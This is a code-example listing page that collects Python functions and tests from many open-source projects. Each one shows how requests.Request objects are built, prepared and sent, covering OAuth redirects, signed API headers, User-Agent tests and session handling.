项目:matrix-creator-alexa-voice-demo    作者:matrix-io    | 项目源码 | 文件源码
def index(self):
    """Redirect the browser to Amazon for authorization.

    Encodes ``Client_ID``, scope ``alexa:all``, JSON scope data (``ProductID``
    and serial number ``"001"``), response type ``code`` and a redirect URI
    (``cherrypy.url()`` followed by ``code``) into the query string of
    ``https://www.amazon.com/ap/oa``.

    :raises cherrypy.HTTPRedirect: always, with the resulting URL.
    """
    scope_data = json.dumps({
        "alexa:all": {
            "productID": ProductID,
            "productInstanceAttributes": {
                "deviceSerialNumber": "001"
            }
        }
    })
    callback = cherrypy.url() + "code"
    payload = {"client_id": Client_ID, "scope": "alexa:all",
               "scope_data": scope_data, "response_type": "code",
               "redirect_uri": callback}
    # The prepared request is used only for its encoded URL; it is not sent.
    prepared = requests.Request(
        'GET', "https://www.amazon.com/ap/oa", params=payload).prepare()
    raise cherrypy.HTTPRedirect(prepared.url)
项目:lets-do-dns    作者:Jitsusama    | 项目源码 | 文件源码
def test_properly_raises_correct_record_failure_on_related_method_error(
        mocker, method, exception):
    """A failing ``raise_for_status`` must surface as the matching exception.

    The stubbed response raises ``HTTPError`` from ``raise_for_status`` and
    carries a request stub with the given ``method``. The failure class named
    after ``exception`` is patched in the response module; it must be called
    exactly once, with the original error.
    """
    http_error = HTTPError()
    failing_raise_for_status = mocker.MagicMock(side_effect=http_error)
    fake_request = mocker.MagicMock(spec=requests.Request, method=method)
    fake_response = mocker.MagicMock(
        spec=requests.Response,
        raise_for_status=failing_raise_for_status,
        request=fake_request)

    patch_target = 'lets_do_dns.do_domain.response.{}'.format(
        exception.__name__)
    mock_record_failure = mocker.patch(patch_target, return_value=exception)

    with pytest.raises(exception):
        Response(fake_response)

    mock_record_failure.assert_called_once_with(http_error)
项目:cbapi-python    作者:carbonblack    | 项目源码 | 文件源码
def _url_to_key(self, url):
    """Return ``self.create_key`` applied to a prepared GET request for ``url``.

    The request is prepared through a fresh ``requests.Session``.
    """
    session = requests.Session()
    get_request = requests.Request('GET', url)
    prepared = session.prepare_request(get_request)
    return self.create_key(prepared)
项目:umapi-client.py    作者:adobe-apiplatform    | 项目源码 | 文件源码
def test_ua_string():
    """The User-Agent must start with the client name/version and mention Python.

    Checked for both a GET and a POST prepared through the connection's session.
    """
    conn = Connection(**mock_connection_params)
    cases = (
        ('GET', {}),
        ('POST', {'data': "This is a test"}),
    )
    for verb, extra in cases:
        req = conn.session.prepare_request(
            requests.Request(verb, "http://test.com/", **extra))
        ua_header = req.headers.get("User-Agent")
        assert ua_header.startswith("umapi-client/" + umapi_version)
        assert " Python" in ua_header
项目:umapi-client.py    作者:adobe-apiplatform    | 项目源码 | 文件源码
def test_ua_string_additional():
    """A custom ``user_agent`` must be placed in front of the client's own.

    Checked for both a GET and a POST prepared through the connection's session.
    """
    conn = Connection(user_agent="additional/1.0", **mock_connection_params)
    cases = (
        ('GET', {}),
        ('POST', {'data': "This is a test"}),
    )
    for verb, extra in cases:
        req = conn.session.prepare_request(
            requests.Request(verb, "http://test.com/", **extra))
        ua_header = req.headers.get("User-Agent")
        assert ua_header.startswith("additional/1.0 umapi-client/" + umapi_version)
项目:cos-python-sdk-v5    作者:tencentyun    | 项目源码 | 文件源码
def get_auth(self, Method, Bucket, Key='', Expired=300, Headers=None, Params=None):
    """Return the ``Authorization`` header value for a request.

    A request for ``Method`` on the URL of ``Key`` inside ``Bucket`` is built
    and passed through ``CosS3Auth``; the ``Authorization`` header of the
    result is returned.

    :param Method(string): http method, e.g. 'PUT', 'GET'.
    :param Bucket(string): bucket passed to ``self._conf.uri``.
    :param Key(string): object key; it is URL-quoted (keeping ``/-_.~``) for
        the URL and passed unquoted to ``CosS3Auth``.
    :param Expired(int): passed to ``CosS3Auth``; presumably the signature
        lifetime in seconds - confirm against ``CosS3Auth``.
    :param Headers(dict): http headers for the request; ``None`` means none.
    :param Params(dict): http query parameters; ``None`` means none.
    :return (string): value of the ``Authorization`` header.
    """
    # A fresh dict per call: a shared ``{}`` default would be handed to the
    # request object and could carry state from one call into the next.
    if Headers is None:
        Headers = {}
    if Params is None:
        Params = {}
    url = self._conf.uri(bucket=Bucket, path=quote(Key, '/-_.~'))
    r = Request(Method, url, headers=Headers, params=Params)
    auth = CosS3Auth(self._conf._secret_id, self._conf._secret_key, Key, Params, Expired)
    return auth(r).headers['Authorization']
项目:zmirror    作者:aploium    | 项目源码 | 文件源码
def response_cookie_rewrite(cookie_string):
    """
    Replace every match of `regex_cookie_rewriter` in a response cookie
    string with `domain=` followed by `my_host_name_no_port`.

    :type cookie_string: str
    :return: the rewritten cookie string
    """
    replacement = 'domain=' + my_host_name_no_port
    return regex_cookie_rewriter.sub(replacement, cookie_string)


# ################# End Server Response Handler #################


# ################# Begin Client Request Handler #################
项目:bearychat.py    作者:bearyinnovative    | 项目源码 | 文件源码
def do(self,
       resource,
       method,
       params=None,
       data=None,
       json=None,
       headers=None):
    """Does the request job

    The URL is ``self._api_base`` joined to ``resource`` with a slash, and
    ``self._token`` is always sent as the ``token`` query parameter.

    Args:
        resource(str): resource uri(relative path)
        method(str): HTTP method
        params(dict): uri queries; the passed dict is not modified
        data(dict): HTTP body(form)
        json(dict): HTTP body(json)
        headers(dict): HTTP headers

    Returns:
        RTMResponse
    """
    uri = "{0}/{1}".format(self._api_base, resource)

    # Work on a copy so the token never ends up in the caller's dict.
    query = dict(params) if params else {}
    query['token'] = self._token

    req = Request(
        method=method,
        url=uri,
        params=query,
        headers=headers,
        data=data,
        json=json)
    # The session serves this single request; close it once the response
    # has been received.
    with Session() as s:
        prepped = s.prepare_request(req)
        resp = s.send(prepped)

    return RTMResponse(resp)
项目:mturk-crowd-beta-client-python    作者:awslabs    | 项目源码 | 文件源码
def _make_request(self, method, function_name, task_name, body=None):
    """Send one request with a JSON body and return the response.

    The URI path comes from ``self._build_uri_path``; the headers come from
    ``self._build_aws_sigv4_headers`` for that method, path and body. The URL
    is ``_ENDPOINT`` followed by the path. The prepared request is logged at
    debug level and sent through a new ``Session`` with ``_TIMEOUT_SECONDS``
    as the timeout.
    """
    uri_path = self._build_uri_path(function_name, task_name)
    signed_headers = self._build_aws_sigv4_headers(method, uri_path, body)

    prepared = Request(
        method,
        _ENDPOINT + uri_path,
        headers=signed_headers,
        json=body,
    ).prepare()

    message = 'Invoking {} on URL {} with headers={}, body={}'.format(
        prepared.method,
        prepared.url,
        json.dumps(dict(prepared.headers)),
        prepared.body)
    logger.debug(message)

    return Session().send(prepared, timeout=_TIMEOUT_SECONDS)
项目:wallstreet    作者:mcdallas    | 项目源码 | 文件源码
def prepare_request(*args, **kwargs):
    """Build a ``requests.Request`` from the arguments and prepare it.

    The request is prepared through a new ``requests.Session``; the prepared
    request is returned.
    """
    request = requests.Request(*args, **kwargs)
    return requests.Session().prepare_request(request)
项目:fbarc    作者:justinlittman    | 项目源码 | 文件源码
def generate_url(self, node_id, definition_name, escape=False):
    """
    Returns the url for retrieving the specified node from the Graph API
    given the node type definition.

    With ``escape`` false the query string is joined as plain ``key=value``
    pairs without any encoding; with ``escape`` true the URL is taken from a
    prepared ``requests.Request`` built with the same parameters.
    """
    url, params = self._prepare_node_request(node_id, definition_name)
    if escape:
        return requests.Request('GET', url, params=params).prepare().url
    query = '&'.join(
        '{}={}'.format(key, value) for key, value in params.items())
    return '{}?{}'.format(url, query)
项目:pyfc4    作者:ghukill    | 项目源码 | 文件源码
def start_txn(self, txn_name=None):

        '''
        Ask the repository for a new transaction and register it locally.

        POSTs to ``<root>/fcr:tx``. On a 201 reply a Transaction is built
        from the ``Location`` and ``Expires`` response headers and stored in
        self.txns under its name.

        Args:
            txn_name (str): human name for transaction; a random uuid4 hex
                string is used when omitted or empty

        Return:
            (Transaction): the newly created transaction, or None when the
                repository did not answer with 201
        '''

        # fall back to a generated name
        name = txn_name if txn_name else uuid.uuid4().hex

        # ask the repository to open a transaction
        reply = self.api.http_request('POST','%s/fcr:tx' % self.root, data=None, headers=None)

        # anything other than 201 means no transaction was created
        if reply.status_code != 201:
            return None

        location = reply.headers['Location']
        logger.debug("spawning transaction: %s" % location)

        # build the Transaction around this repository, passing the Expires header along
        new_txn = Transaction(self, name, location, expires = reply.headers['Expires'])

        # register and hand back
        self.txns[name] = new_txn
        return new_txn
项目:talisker    作者:canonical-ols    | 项目源码 | 文件源码
def response(method='GET', host='http://example.com', url='/', code=200, elapsed=1.0):
    """Build a ``requests.Response`` carrying the given request details.

    The response's ``request`` is a prepared ``method`` request to
    ``host + url``; ``code`` becomes its status code and ``elapsed``
    (seconds) becomes a ``timedelta``.
    """
    prepared = requests.Request(method, host + url).prepare()

    resp = requests.Response()
    resp.request = prepared
    resp.status_code = code
    resp.elapsed = timedelta(seconds=elapsed)
    return resp
项目:talisker    作者:canonical-ols    | 项目源码 | 文件源码
def test_configure():
    """A configured session puts the active request id into ``X-Request-Id``."""
    sess = requests.Session()
    talisker.requests.configure(sess)
    request = requests.Request('GET', 'http://localhost')

    # prepare the request while the request-id context is active
    with talisker.request_id.context('XXX'):
        headers = sess.prepare_request(request).headers

    assert headers['X-Request-Id'] == 'XXX'
项目:trio2o    作者:openstack    | 项目源码 | 文件源码
def forward_req(context, action, b_headers, b_url, b_body):
    """Send a request built from the given parts and return the response.

    Args:
        context: accepted for interface compatibility; not used here.
        action: HTTP method name.
        b_headers: headers for the outgoing request.
        b_url: target URL.
        b_body: request body, passed as ``data``.

    Returns:
        The response object returned by ``Session.send``.
    """
    prepped = Request(action, b_url,
                      data=b_body,
                      headers=b_headers).prepare()

    # Context-manage the session so its pooled connections are closed once
    # the (non-streamed) response has been read.
    with Session() as s:
        return s.send(prepped,
                      timeout=60)
项目:threatstack-python-client    作者:MyPureCloud    | 项目源码 | 文件源码
def http_request(self, method, path, data=None, params=None):
        """Wrap HTTP calls to the Threat Stack API.

        Args:
            method: HTTP method name.
            path: path joined onto ``self.BASE_URL`` with ``urljoin``.
            data: optional request body.
            params: optional query-string parameters.

        Returns:
            Whatever ``self.handle_response`` returns for the response.

        Raises:
            errors.APIRateLimitError: when the API answers with HTTP 429.
        """
        url = urljoin(self.BASE_URL, path)
        headers = {"Authorization": self.api_key}
        # the organization header is only sent when an org id is configured
        if self.org_id:
            headers[self.org_id_header] = self.org_id

        prepped = Request(
            method,
            url,
            headers=headers,
            data=data,
            params=params
        ).prepare()

        # Close the session (and its connection pool) as soon as the
        # non-streamed response has been received.
        with Session() as s:
            resp = s.send(prepped, timeout=self.timeout)

        if resp.status_code == 429:
            raise errors.APIRateLimitError("Threat Stack API rate limit exceeded")
        return self.handle_response(resp)
项目:mygene.info    作者:biothings    | 项目源码 | 文件源码
def _query(self, *args, **kwargs):
        """Send a request through ``self.client`` and return the response text.

        The arguments are passed unchanged to ``requests.Request``.
        Raises MartException when the status code is not 200 or when the
        body starts with 'Query ERROR:'.
        """
        prepared = requests.Request(*args, **kwargs).prepare()
        res = self.client.send(prepared)
        if res.status_code != 200:
            raise MartException(res)

        body = res.text
        if body.startswith('Query ERROR:'):
            raise MartException(body)
        return body
项目:pycarwings2    作者:jdhorne    | 项目源码 | 文件源码
def _request(self, endpoint, params):
        """POST ``params`` to ``BASE_URL + endpoint`` and return the decoded JSON reply.

        ``params`` is modified in place: ``initial_app_strings`` and
        ``custom_sessionid`` entries are added before the request is sent.

        Args:
            endpoint: path appended to ``BASE_URL``.
            params: dict of form fields to send.

        Returns:
            The reply body parsed with ``json.loads``.

        Raises:
            CarwingsError: when the HTTP request fails, when the reply's
                ``message`` is "INVALID PARAMS", or when the reply contains
                an ``ErrorMessage`` entry.
        """
        params["initial_app_strings"] = "geORNtsZe5I4lRGjG9GZiA"
        params["custom_sessionid"] = self.custom_sessionid or ""

        req = Request('POST', url=BASE_URL + endpoint, data=params).prepare()

        log.debug("invoking carwings API: %s" % req.url)
        log.debug("params: %s" % json.dumps(params, sort_keys=True, indent=3, separators=(',', ': ')))

        try:
            # context-managed so the connection pool is released afterwards
            with requests.Session() as sess:
                response = sess.send(req)
        except RequestException:
            # Previously execution fell through to json.loads() with
            # ``response`` unbound, raising UnboundLocalError; report the
            # failure through the module's own exception type instead.
            log.warning('HTTP Request failed')
            raise CarwingsError("HTTP Request failed")

        log.debug('Response HTTP Status Code: {status_code}'.format(
            status_code=response.status_code))
        log.debug('Response HTTP Response Body: {content}'.format(
            content=response.content))

        j = json.loads(response.content)

        # .get() keeps a missing detail key from masking the CarwingsError
        # with a KeyError raised while building the log message.
        if "message" in j and j["message"] == "INVALID PARAMS":
            log.error("carwings error %s: %s" % (j["message"], j.get("status")))
            raise CarwingsError("INVALID PARAMS")
        if "ErrorMessage" in j:
            log.error("carwings error %s: %s" % (j.get("ErrorCode"), j["ErrorMessage"]))
            raise CarwingsError

        return j